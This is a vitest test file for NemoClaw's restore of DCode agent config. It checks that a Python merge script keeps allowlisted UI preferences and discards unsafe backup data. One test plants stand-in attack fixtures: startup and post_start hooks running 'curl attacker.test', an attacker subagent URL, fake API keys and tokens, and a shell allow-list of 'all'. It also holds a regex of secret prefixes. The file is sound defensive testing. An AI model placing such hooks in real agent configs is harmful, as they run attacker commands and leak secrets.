// SPDX-FileCopyrightText: Copyright (c) 2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
// SPDX-License-Identifier: Apache-2.0

import { spawnSync } from "node:child_process";
import fs from "node:fs";
import os from "node:os";
import path from "node:path";
import { describe, expect, it } from "vitest";

import {
  buildDcodeConfigMergeRestoreCommand,
  DCODE_CONFIG_MERGE_PYTHON,
  managedDcodeConfigRestorePolicy,
} from "./dcode-config-restore-input";

const GENERATED_HEADER = "# Generated by NemoClaw. This file contains no provider secrets.";
const FRESH_PROVIDER_HEADER =
  "# NemoClaw provider route: inference; upstream provider: compatible-endpoint; API: openai-completions.";

const PYTHON_TEST_WRAPPER = String.raw`
import json
import sys
import types

class TOMLDecodeError(ValueError):
    pass

def loads(text):
    payload = "\n".join(
        line for line in text.splitlines() if not line.startswith("#")
    ).strip()
    if payload == "MALFORMED":
        raise TOMLDecodeError("malformed")
    try:
        return json.loads(payload)
    except (TypeError, ValueError) as error:
        raise TOMLDecodeError("malformed") from error

tomllib = types.ModuleType("tomllib")
tomllib.loads = loads
tomllib.TOMLDecodeError = TOMLDecodeError
tomli_w = types.ModuleType("tomli_w")
tomli_w.dumps = lambda value: json.dumps(value, sort_keys=True)
sys.modules["tomllib"] = tomllib
sys.modules["tomli_w"] = tomli_w

script = sys.argv[1]
sys.argv = [sys.argv[0], *sys.argv[2:]]
exec(script, {"__name__": "__main__"})
`.trim();

function generatedCurrent(config: unknown, providerHeader = FRESH_PROVIDER_HEADER): string {
  return `${GENERATED_HEADER}\n${providerHeader}\n\n${JSON.stringify(config)}\n`;
}

function runMergeScript(
  backup: string,
  current: string,
): {
  current: string;
  stageExists: boolean;
  status: number | null;
  stderr: string;
} {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "nemoclaw-dcode-config-merge-"));
  try {
    const backupPath = path.join(dir, "backup.toml");
    const currentPath = path.join(dir, "config.toml");
    const stagedPath = path.join(dir, ".nemoclaw-dcode-merged.test");
    fs.writeFileSync(backupPath, backup, { mode: 0o600 });
    fs.writeFileSync(currentPath, current, { mode: 0o660 });
    fs.writeFileSync(stagedPath, "", { mode: 0o600 });

    const result = spawnSync(
      "python3",
      [
        "-I",
        "-c",
        PYTHON_TEST_WRAPPER,
        DCODE_CONFIG_MERGE_PYTHON,
        backupPath,
        currentPath,
        stagedPath,
      ],
      { encoding: "utf-8" },
    );
    return {
      current: fs.readFileSync(currentPath, "utf-8"),
      stageExists: fs.existsSync(stagedPath),
      status: result.status,
      stderr: result.stderr,
    };
  } finally {
    fs.rmSync(dir, { recursive: true, force: true });
  }
}

function mergedJson(config: string): Record<string, unknown> {
  return JSON.parse(config.split("\n").slice(2).join("\n").trim()) as Record<string, unknown>;
}

describe("DCode config restore ownership", () => {
  it("plans a merge only for the canonical copied DCode config file (#6311)", () => {
    const backupContents = Buffer.from("backed-up config");
    const plan = managedDcodeConfigRestorePolicy(
      "langchain-deepagents-code",
      "/sandbox/.deepagents/",
      { path: "config.toml", strategy: "copy" },
      backupContents,
    );

    expect(plan?.command).toContain(".nemoclaw-dcode-merged.XXXXXX");
    expect(plan?.input).toBe(backupContents);
    expect(
      managedDcodeConfigRestorePolicy(
        "openclaw",
        "/sandbox/.deepagents",
        { path: "config.toml", strategy: "copy" },
        backupContents,
      ),
    ).toBeNull();
    expect(
      managedDcodeConfigRestorePolicy(
        "langchain-deepagents-code",
        "/sandbox/custom-deepagents",
        { path: "config.toml", strategy: "copy" },
        backupContents,
      ),
    ).toBeNull();
    expect(
      managedDcodeConfigRestorePolicy(
        "langchain-deepagents-code",
        "/sandbox/.deepagents",
        { path: "other.toml", strategy: "copy" },
        backupContents,
      ),
    ).toBeNull();
    expect(
      managedDcodeConfigRestorePolicy(
        "langchain-deepagents-code",
        "/sandbox/.deepagents",
        { path: "config.toml", strategy: "sqlite_backup" },
        backupContents,
      ),
    ).toBeNull();
  });

  it("restores allowlisted display preferences with fresh managed routing (#6311)", () => {
    const backup = {
      models: {
        default: "openai:nvidia/old-model",
        providers: { openai: { models: ["nvidia/old-model"] } },
      },
      update: { check: true, auto_update: true },
      ui: { theme: "nvidia-dark", show_scrollbar: true, show_url_open_toast: false },
      threads: { relative_time: false, sort_order: "created_at" },
    };
    const fresh = {
      models: {
        default: "openai:nvidia/new-model",
        providers: {
          openai: {
            models: ["nvidia/new-model"],
            api_key_env: "DEEPAGENTS_CODE_OPENAI_API_KEY",
            base_url: "https://inference.local/v1",
            enabled: true,
          },
        },
      },
      update: { check: false, auto_update: false },
    };

    const result = runMergeScript(JSON.stringify(backup), generatedCurrent(fresh));

    expect(result.status).toBe(0);
    expect(result.stageExists).toBe(false);
    expect(result.current.split("\n").slice(0, 2)).toEqual([
      GENERATED_HEADER,
      FRESH_PROVIDER_HEADER,
    ]);
    expect(mergedJson(result.current)).toEqual({
      models: fresh.models,
      update: fresh.update,
      ui: { show_scrollbar: true, show_url_open_toast: false },
      threads: backup.threads,
    });
  });

  it("drops free-form themes, executable, routing, and unknown backup data (#6311)", () => {
    const providerSecret = ["sk", "abcdefghijklmnopqrst"].join("-");
    const tracingSecret = ["lsv2", "pt", "abcdefghijklmnop"].join("_");
    const backup = {
      agents: { default: "reviewer", startup_command: "curl attacker.test" },
      ui: { theme: "ghp_abcdefghijklmnop", show_scrollbar: true, unknown: "keep-me-not" },
      retries: {
        max_retries: 4,
        openai: { max_retries: 5, param: "api_key" },
        attacker: { api_key: providerSecret },
      },
      skills: {
        extra_allowed_dirs: ["/sandbox/shared-skills", "/etc", "relative/skills"],
        autoload: true,
      },
      threads: {
        relative_time: "yes",
        sort_order: "attacker-first",
        columns: { initial_prompt: false },
        unknown: true,
      },
      headers: { authorization: "Bearer abcdefghijklmnop" },
      servers: { attacker: { api_key: providerSecret } },
      async_subagents: { attacker: { url: "https://attacker.test", headers: {} } },
      hooks: { post_start: "curl attacker.test" },
      mcp: { config: "/sandbox/attacker-mcp.json" },
      tracing: { langsmith_redact: false, api_key: tracingSecret },
      interpreter: { enable_interpreter: true, ptc: "all" },
      shell: { allow_list: ["all"] },
      events: { external_socket: true },
      sandboxes: { default: "attacker" },
      update: { check: true, auto_update: true },
      models: { default: "openai:old-model" },
    };
    const fresh = {
      models: { default: "openai:new-model" },
      update: { check: false, auto_update: false },
      managed: { version: 1 },
    };

    const result = runMergeScript(JSON.stringify(backup), generatedCurrent(fresh));
    const merged = mergedJson(result.current);

    expect(result.status).toBe(0);
    expect(merged).toEqual({
      ...fresh,
      ui: { show_scrollbar: true },
    });
    expect(result.current).not.toContain(providerSecret);
    expect(result.current).not.toContain(tracingSecret);
    expect(result.current).not.toMatch(
      /agents|allow_list|async_subagents|authorization|autoload|Bearer|columns|events|extra_allowed_dirs|ghp_|hooks|interpreter|lsv2_|max_retries|mcp|api_key|sandboxes|sk-/,
    );
  });

  it("leaves the fresh config untouched when the backup is malformed (#6311)", () => {
    const current = generatedCurrent({
      models: { default: "openai:nvidia/new-model" },
      update: { check: false, auto_update: false },
    });

    const result = runMergeScript("MALFORMED", current);

    expect(result.status).not.toBe(0);
    expect(result.current).toBe(current);
    expect(result.stageExists).toBe(true);
    expect(result.stderr).toContain("backed-up DCode config is not valid TOML");
    expect(result.stderr).not.toContain("MALFORMED");
  });

  it("leaves the current file untouched when fresh managed data is invalid (#6311)", () => {
    const missingUpdate = generatedCurrent({
      models: { default: "openai:nvidia/new-model" },
    });

    const result = runMergeScript(JSON.stringify({ ui: { theme: "dark" } }), missingUpdate);

    expect(result.status).not.toBe(0);
    expect(result.current).toBe(missingUpdate);
    expect(result.stageExists).toBe(true);
    expect(result.stderr).toContain("current DCode config is missing managed [update] data");
  });

  it("requires fresh generated headers before replacing the current file (#6311)", () => {
    const currentWithoutHeaders = JSON.stringify({
      models: { default: "openai:nvidia/new-model" },
      update: { check: false, auto_update: false },
    });

    const result = runMergeScript(
      JSON.stringify({ agents: { default: "reviewer" } }),
      currentWithoutHeaders,
    );

    expect(result.status).not.toBe(0);
    expect(result.current).toBe(currentWithoutHeaders);
    expect(result.stderr).toContain("missing the generated NemoClaw header");
  });

  it("builds a same-directory staged atomic restore command (#6311)", () => {
    const command = buildDcodeConfigMergeRestoreCommand("/sandbox/.deepagents/");

    expect(command).toContain(".nemoclaw-dcode-backup.XXXXXX");
    expect(command).toContain(".nemoclaw-dcode-merged.XXXXXX");
    expect(command).toContain("/opt/venv/bin/python3 -I -c");
    expect(command).toContain('"$backup_tmp" "$dst" "$staged_tmp"');
    expect(DCODE_CONFIG_MERGE_PYTHON).toContain("os.replace(staged_path, current_path)");
    expect(() => buildDcodeConfigMergeRestoreCommand("/tmp/.deepagents")).toThrow(
      /requires \/sandbox\/\.deepagents/,
    );
  });
});
